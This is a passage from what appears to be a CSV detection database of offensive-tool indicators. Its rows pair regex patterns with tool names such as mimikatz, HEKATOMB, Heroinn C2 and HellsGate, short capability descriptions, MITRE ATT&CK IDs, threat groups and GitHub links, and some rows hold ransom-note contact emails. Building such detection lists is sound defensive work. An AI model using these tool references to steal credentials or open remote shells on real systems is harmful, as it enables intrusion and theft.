T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","N/A","10","","N/A","","","","47076" "*HeapCrypt-main*",".{0,1000}HeapCrypt\-main.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","47078" "*HeapEncryptDecrypt.cpp*",".{0,1000}HeapEncryptDecrypt\.cpp.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","47079" "*HeapEncryptDecrypt.exe*",".{0,1000}HeapEncryptDecrypt\.exe.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","47080" "*HeapEncryptDecrypt.sln*",".{0,1000}HeapEncryptDecrypt\.sln.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","47081" "*HeapEncryptDecrypt.vcxproj*",".{0,1000}HeapEncryptDecrypt\.vcxproj.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","47082" "*HEHE - YOU HAVE BEEN PWENED*",".{0,1000}HEHE\s\-\sYOU\sHAVE\sBEEN\sPWENED.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","47083" "*hekatomb -hashes *",".{0,1000}hekatomb\s\-hashes\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","47084" "*hekatomb-*.tar.gz*",".{0,1000}hekatomb\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","10","","N/A","","","","47085" "*hekatomb*-hashes *",".{0,1000}hekatomb.{0,1000}\-hashes\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","10","","N/A","","","","47086" "*hekatomb-*-py3-none-any.whl*",".{0,1000}hekatomb\-.{0,1000}\-py3\-none\-any\.whl.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","10","","N/A","","","","47087" "*hekatomb.ad_ldap*",".{0,1000}hekatomb\.ad_ldap.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","47088" "*hekatomb@thiefin.fr*",".{0,1000}hekatomb\@thiefin\.fr.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","#email","N/A","10","","N/A","","","","47089" "*hekatomb_dump*",".{0,1000}hekatomb_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","47090" "*HellHall-main.zip*",".{0,1000}HellHall\-main\.zip.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","47091" "*hello %3e c:\\temp\\test.txt*",".{0,1000}hello\s\%3e\sc\:\\\\temp\\\\test\.txt.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","47092" "*Hello from DCShadow*",".{0,1000}Hello\sfrom\sDCShadow.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","47093" "*Hello from DllMain-PROCESS_ATTACH in Merlin!*",".{0,1000}Hello\sfrom\sDllMain\-PROCESS_ATTACH\sin\sMerlin!.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","47094" "*Hello from KaynLdr*",".{0,1000}Hello\sfrom\sKaynLdr.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","47095" "*Hello from Malicious DLL*",".{0,1000}Hello\sfrom\sMalicious\sDLL.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","47096" "*Hello From sadsad Team*",".{0,1000}Hello\sFrom\ssadsad\sTeam.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","47097" "*Hello, you have been pwned!*",".{0,1000}Hello,\syou\shave\sbeen\spwned!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","47098" "*hello@pico.sh*",".{0,1000}hello\@pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","47099" "*hello_from_powerautomatec2*",".{0,1000}hello_from_powerautomatec2.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a 
C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#content","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","47100" "*HelloReflectionWorld.exe*",".{0,1000}HelloReflectionWorld\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","47101" "*hellsgate.asm*",".{0,1000}hellsgate\.asm.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","47102" "*HellsGate.exe*",".{0,1000}HellsGate\.exe.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","47103" "*HellsGate.sln*",".{0,1000}HellsGate\.sln.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","47104" "*HellsGate.vcxproj*",".{0,1000}HellsGate\.vcxproj.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","47105" "*Hell'sHall.vcxproj*",".{0,1000}Hell\'sHall\.vcxproj.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","47106" "*Hell'sHall-Clang&NoCrt.zip*",".{0,1000}Hell\'sHall\-Clang\&NoCrt\.zip.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","47107" "*help.blacksnaketeam@evilmail.to*",".{0,1000}help\.blacksnaketeam\@evilmail\.to.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47108" "*help\dll.txt*",".{0,1000}help\\dll\.txt.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","47109" "*helpermail@onionmail.org*",".{0,1000}helpermail\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47110" "*helpers.gpoddity_smbserver*",".{0,1000}helpers\.gpoddity_smbserver.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","47111" "*helpmanager@airmail.cc*",".{0,1000}helpmanager\@airmail\.cc.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47112" "*helpteam@mail.ch*",".{0,1000}helpteam\@mail\.ch.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47113" "*helviojunior/hookchain*",".{0,1000}helviojunior\/hookchain.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","1","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","47114" "*helviojunior/knowsmore*",".{0,1000}helviojunior\/knowsmore.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black 
Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","47115" "*Henkru/cs-token-vault*",".{0,1000}Henkru\/cs\-token\-vault.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","47116" "*henriksb/ExtensionSpoofer*",".{0,1000}henriksb\/ExtensionSpoofer.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file 
icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","47117" "*HENRY.PROWSE@TUTANOTA.COM*",".{0,1000}HENRY\.PROWSE\@TUTANOTA\.COM.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47118" "*henry-richard7/Browser-password-stealer*",".{0,1000}henry\-richard7\/Browser\-password\-stealer.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","47119" "*Here are some passwords for you, have fun:*",".{0,1000}Here\sare\ssome\spasswords\sfor\syou,\shave\sfun\:.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","#content","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","47120" "*Here are the oneliners for reverse shell using rpc named pipes*",".{0,1000}Here\sare\sthe\soneliners\sfor\sreverse\sshell\susing\srpc\snamed\spipes.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral 
Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","47121" "*hereiam.tuns.sh*",".{0,1000}hereiam\.tuns\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","47122" "*hernan@ampliasecurity.com*",".{0,1000}hernan\@ampliasecurity\.com.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#email","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","47123" "*HernanRodriguez1/SharpBruteForceSSH*","HernanRodriguez1\/SharpBruteForceSSH","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","1","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","47124" "*Heroinn FTP*",".{0,1000}Heroinn\sFTP.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47125" "*heroinn_client*",".{0,1000}heroinn_client.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - 
TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47126" "*heroinn_core*",".{0,1000}heroinn_core.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47127" "*heroinn_ftp*",".{0,1000}heroinn_ftp.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47128" "*heroinn_shell*",".{0,1000}heroinn_shell.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47129" "*heroinn_util*",".{0,1000}heroinn_util.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47130" "*HeroinnApp*",".{0,1000}HeroinnApp.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by 
Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47131" "*HeroinnProtocol*",".{0,1000}HeroinnProtocol.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47132" "*HeroinnServerCommand*",".{0,1000}HeroinnServerCommand.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47133" "*herrcore/LocalShellExtParse*",".{0,1000}herrcore\/LocalShellExtParse.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","1","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","47134" "*Hey Dear! You Have Won Free Rs 399 Jio 